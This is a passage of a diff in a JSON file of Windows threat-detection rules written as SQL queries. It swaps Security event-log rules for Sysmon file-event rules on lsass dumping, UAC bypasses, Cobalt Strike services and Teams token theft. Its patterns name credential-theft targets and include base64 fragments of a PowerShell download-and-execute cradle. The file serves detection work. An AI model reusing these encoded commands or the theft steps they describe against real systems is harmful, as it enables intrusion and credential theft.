'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ], + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Programs that connect locally to the RDP port" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "status": "test", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "SCCM" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "status": "test", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", + "tags": [ + "attack.discovery", + "attack.t1046" + ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "status": "test", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Administrators configuring new users." + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + ], + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + }, + { + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "status": "experimental", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + 